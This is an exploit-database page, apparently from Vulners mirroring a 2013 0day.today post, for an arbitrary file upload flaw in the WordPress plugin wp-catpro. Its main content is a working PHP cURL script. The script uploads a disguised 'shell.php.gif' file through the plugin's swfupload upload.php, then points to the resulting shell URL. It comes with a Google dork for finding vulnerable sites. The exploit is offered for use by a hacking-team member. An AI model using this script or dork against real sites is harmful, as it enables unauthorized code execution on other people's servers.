Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Wordpress plugins wp-catpro Arbitrary File Upload Vulnerability

🗓️ 30 Jan 2013 00:00:00Reported by Zikou-16Type 
zdt
 zdt🔗 0day.today👁 843 Views

wordpress wp-catpro Arbitrary File Upload Vulnerabilit

Show more
Code
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => [email protected]
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/wp-catpro/"
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ [email protected]#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
 

#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 

Shell Access : http://[target]/[path]/wp-content/uploads/catpro/random_name.php.gif
 
<?php
phpinfo();
?>
 
------------------------------
 
Greet'z To #=> KedAns-Dz - JIGsaw - Elite Trojan - Anonymous Algeria - DZMafia & All Inj3ct0r Member  <= Th3 End ^_^

#  0day.today [2018-01-09]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Jan 2013 00:00Current
7High risk
Vulners AI Score7
wordpress pluginsarbitrary file uploadvulnerabilityexploitzikou-16file extensionsphp.gifswfuploadshell access
843
.json
Report